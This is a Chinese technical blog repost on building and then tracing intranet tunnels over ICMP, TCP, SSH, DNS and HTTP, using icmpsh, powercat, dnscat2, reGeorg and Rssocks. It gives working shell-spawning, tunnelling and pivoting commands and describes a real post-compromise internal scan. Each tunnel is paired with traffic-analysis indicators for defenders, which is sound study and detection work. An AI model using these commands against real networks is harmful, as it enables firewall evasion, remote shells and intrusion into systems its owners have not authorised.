我是靠谱客的博主 瘦瘦百合,最近开发中收集的这篇文章主要介绍内网穿透从搭建到溯源,觉得挺不错的,现在分享给大家,希望可以做个参考。

概述

目录

背景

内网穿透及溯源

网络层隧道搭建

传输层隧道搭建

应用层隧道搭建

测试通信

案例

总结


背景

在攻防博弈这个永久的话题中,永远不会缺少一个重要角色即内网穿透。当渗透测试人员在进入内网,需要扩大战果的时候,往往会遇到内网的一些防护策略,不外乎边界设备、防火墙及入侵检测设备对端口或者数据包的拦截,导致流量无法出网,此时就需要熟练掌握内网穿透技术,从复杂的内网环境中获取稳定的流量交互,从而达到目的。

本文针对边界安全设备等对内网端口的屏蔽及数据包的拦截,从不同的网络协议层进行搭建隧道进行绕过,并对不同类型的隧道流量或者日志进行分析,帮助攻击或防守人员从溯源的维度更好的掌握内网穿透技术。

内网穿透及溯源

网络层隧道搭建

从网络层开始,主要的隧道技术有IPV6隧道、ICMP隧道、GRE隧道,其中常用的隧道技术是ICMP隧道技术。

icmp隧道搭建

icmp隧道搭建的场景主要用于在拦截策略关闭了端口,而ICMP协议用于检测网络连通状态,不依赖于端口开放,而防火墙通常会开放此协议。通常用于搭建icmp隧道的工具有icmpsh、PingTunnel、powershell icmp等,本次测试使用icmpsh。

  • 搭建工具(https://github.com/inquisb/icmpsh)

首先在目标主机进行Ping测试:

ping 192.168.43.136

image-20200615161907365

接下来在attack主机执行监听:

在victim主机执行shell反弹命令,该命令在server端有返回:

icmpsh.exe -t 192.168.43.136 -d 500 -b 30 -s 128

反弹成功:

此处已经搭建成功

icmp隧道分析

首先查看普通ping数据包:

再看下执行了命令netstat -ano产生的数据包:

通过对比,我们发现普通的ping请求存在4个带有32字节数据的数据包,并且数据内容为abcdefghigklmnopqrstuvwabcdefghi;而相对的使用ICMP隧道搭建的shell通道执行了命令的流量显示在短时间内有大量的icmp请求和回复流量,每个数据包的data含有高达128字节的数据,这个data数据可以通过命令进行修改,同时可以看到数据中含有大量的命令执行的内容返回,因此该隧道的溯源可以从以下方面进行:

  • 单位时间内的icmp数据包数量

  • 数据包大小

  • 数据包内容

传输层隧道搭建

传输层主要有TCP、UDP协议,因此隧道搭建也是基于这两种协议进行的。常用的隧道搭建工具有netcat、powercat等,本文通过powercat和nc进行测试

工具下载:powercat(https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1)

powercat隧道搭建

victim(192.168.43.109):

Import-Module .powercat.ps1
powercat -l -p 8888 -e cmd.exe -v

attack(192.168.43.136):

nc 192.168.43.109 8888 -vv

在victim端看到与远程连接建立成功:

在attack端可以成功执行命令:

powercat隧道分析

通过查看powercat搭建的隧道进行执行命令获取的数据包,可以看到获取到很多的TCP数据包,同时可以看到短时间内发出大量的ack回应数据包,并且夹杂很多psh数据包,表明该数据包是包括数据内容,我们通过查看数据包的data数据可以看到内容中包含我们执行的命令及响应内容。通过wireshark的数据包进行分析,我们可以通过对数据包的内容进行安全检测进行防御。

应用层隧道搭建

应用层位于TCP/IP协议的最顶层,通常用于搭建各种应用服务,而基于应用层搭建的隧道技术就是利用各种应用所占用的端口进行搭建,比如有SSH、HTTP/HTTPS和DNS服务,这些服务是服务器经常用到不会被禁止的协议。

ssh隧道搭建

SSH是英文Secure Shell的简写形式,SSH 为建立在应用层基础上的安全协议。SSH 是较可靠,专为远程登陆会话和其他网络服务提供安全性的协议。ftp、pop和telnet在本质上都是不安全的,因为它们在网络上用明文传送口令和数据,别有用心的人非常容易就可以截获这些口令和数据。而且,这些服务程序的安全认证方式也是有其弱点的, 就是很容易受到“中间人”攻击,SSH目前包括 SSH1和SSH2两个版本,是目前最常用的安全通讯协议。通常情况下,ssh协议是允许通过防火墙和边界设备。

ssh隧道通常用于端口转发,常用的端口转发有本地转发、远程转发和动态转发,其利用场景也不同,以下将分别介绍:

本地转发

本地转发一般用于外网通过dmz资源访问内部无外网ip的资源,此时dmz资源通常有外网ip且可访问外网,以下内部无外网ip资源简称inner。

dmz-host(192.168.43.179)

inner-host(192.168.43.168)

attack-host(192.168.43.136)配置如下:

ssh -CfNg -L 1234:192.168.43.168:22 sobug@192.168.43.179

此时通过attack进行访问本地1234即可连接inner主机22端口的ssh服务,此时重点注意sir为inner的登录名,语句如下:

ssh -p 1234 sir@192.168.43.136

远程转发

远程转发一般用于外网通过dmz资源访问内部无外网ip的资源,同时此时dmz资源也没有外部ip,以下内部无外网资源简称inner:

inner-host(192.168.43.168)

attack-host(192.168.43.136)

dmz-host(192.168.43.179)配置如下:

ssh -CfNg -R 2345:192.168.43.168:22 root@192.168.43.136

通过在attack主机执行,可以成功连接inner主机的ssh服务

ssh -p 1122 sir@127.0.0.1

动态转发

动态转发一般在外网attack主机上通过dmz主机搭建一个外部的socks4/5代理,然后通过代理软件添加需要代理的程序即可对内网中的资源进行访问。

inner-host(192.168.43.168)

dmz-host(192.168.43.179)

attack-host(192.168.43.136)配置代理如下:

ssh -CfNg -D 8888 sobug@192.168.43.179

ssh隧道分析

由于SSH 为建立在应用层基础上的安全协议,在数据传输中的流量都被加密,因此我们在wireshark中抓到的包看不出异常点,此时我们可以通过端口连接进行判断,以远程转发ssh隧道为例,我们查询端口连接情况,发现本机与外网主机192.168.43.136的22端口有建立连接信息

然后当外网连接内部主机后,同一PID3104分别与外网和内网建立了连接,我们通过这种方法基本可以确定本主机被搭建了ssh隧道进行内网流量转发操作。

dns隧道搭建

  • vps部署域名解析

首先对vps建立A记录 创建NS记录,获取子域名的解析地址为A记录的域名

对NS记录mail子域进行解析指向ns1*.club的A记录

测试部署:

测试外部对mail子域的dns请求,然后查看vps是否处理该请求

客户端发送dns请求数据包:

vps对请求数据的处理

tcpdump -n -i eth0 udp dst port 53

  • 安装dnscat2服务端

server端:

需要ruby环境

安装gem、ruby、dnscat2服务端

yum install gem
rm /usr/bin/ruby
wget https://cache.ruby-lang.org/pub/ruby/2.5/ruby-2.5.0.tar.gz
tar -zxvf ruby-2.5.0.tar.gz
cd ruby-2.5.0
mkdir -p /usr/local/ruby
./configure --prefix=/usr/local/ruby
make  && make install
ln -s /usr/local/ruby/bin/ruby /usr/bin/ruby


git clone https://github.com/iagox86/dnscat2.git
cd /server
gem install bunlder
ln /usr/local/ruby/bin/bunlder /usr/bin/bunlder
bunlder install

启动服务端:

ruby dnscat2.rb mail.****.club -e open -c password --no-cache

客户端下载地址https://downloads.skullsecurity.org/dnscat2/powershell客户端https://codeload.github.com/lukebaggett/dnscat2-powershell/zip/master

测试通信

./ruby --ping mail.target.com

连接服务端

./dnscat --secret=password mail.target.com

以下显示连接成功

server端

sessions显示已经有客户端会话

session -i session_id

进入会话,执行shell交互命令行

通过监听53端口的流量包发现大量的dns请求数据

tcpdump -n -i eth0 udp dst port 53

dns隧道分析

通过流量监测,我们可轻易判断出存在大量的DNS协议的数据包,同时该数据包与普通的dns请求完全不同,首先是请求的dns域名前存在一段加密的字符串,其次dns记录分布于TXT记录、MX记录和CNAME记录

从以下服务端的tcpdump监测的日志也可明显看出与普通dns请求的区别

因此我们可以从以下几方面进行防御:

  • 设置受信任的DNS服务器进行通信

  • 阻止传入和传出的TXT请求

  • 对频繁进行DNS请求的设备进行禁用并发出警告

http隧道搭建

HTTP协议是互联网上常用的通信协议之一。它有很多的应用,但最流行的就是用于Web浏览器和Web服务器之间的通信,即Web应用。通过HTTP服务搭建代理,通常用于将外部流量转入内网中,常用的工具有reGeorg、tunna等。以下通过reGeorg进行测试。

dmz:192.168.157.148/192.168.247.130

attack:192.168.157.147

victim:192.168.247.152

reGeorg可以支持PHP、ASPX、JSP等脚本语言,我们需要将脚本上传至目标服务器中,

我们通过上传tunnel文件到dmz服务器上:

然后搭建基于该文件搭建socks5隧道:

说明隧道搭建成功,此时进行配置proxifier

搭建到本地代理的8888端口

并配置mstsc流量从该代理发出:

接下来我们看到可以成功连接victim主机

 

http隧道分析

首先通过查看抓取的数据流量,我们发现存在http请求,并且请求中包括有cmd、target和port三个参数

然后查看该数据包,在数据包中看到请求的源IP端口及目的IP端口,显然请求参数中IP端口和该数据包的IP端口是不一样的

 

我们通过监听第二个网卡(192.168.247.130),发现可以看到存在对远程服务器的3389端口链接数据请求,并看到请求的目的端口的服务名ms-wbt-server.

通过以上分析,我们可以针对http协议的数据包进行查看,并结合数据包中的ip参数进行溯源,同时针对该ip进行检索数据包查看本机ip对该ip的操作内容进行多层次的溯源,同时我们需要结合本机的windows日志进行配合溯源。

案例

在某次项目中,通过灵机一动的思路getshell后,由于在菜刀下的操作比较局限,因此思考可以将流量转出来,在多次尝试后,成功使用Rssocks搭建了ssocks隧道,下面简单说一下当时的情况:

Rssocks下载地址:http://sourceforge.net/projects/ssocks/

由于目标系统为linux系统,因此需要在ssocks中编译安装ssocks

./configure && make && make install

首先在外网的vps上通过执行如下命令

Rcsocks -l 5001 -p 8009 -vv

然后在目标主机执行

Rssocks -vv -s vpsip:1080

 

接下来通过proxifier链接socks代理:vpsip:1088

扫描的内网某ip端口

 

此外需要用到kali里的工具proxychains, 修改proxychains配置文件

去掉dynamic_chain注释,在最后一行加入代理,测试内网联通性:

此时对内网的流量操控还是很顺手的,看到有10.x.x.16有开放80端口服务

 

浏览器访问探测出的web服务10.x.x.16

总结

内网穿透的工具和技巧有很多,本次基于各层协议介绍了具有代表性的搭建隧道方法,不过原理大都相似,重点在于项目中遇到各种复杂的环境时,能快速判断到可用的隧道类型,并能克服环境中的坑位;同时希望本文能帮助项目中的防守人员从溯源维度更好的掌握内网穿透技术。

最后

以上就是瘦瘦百合为你收集整理的内网穿透从搭建到溯源的全部内容,希望文章能够帮你解决内网穿透从搭建到溯源所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(34)

评论列表共有 0 条评论

立即
投稿
返回
顶部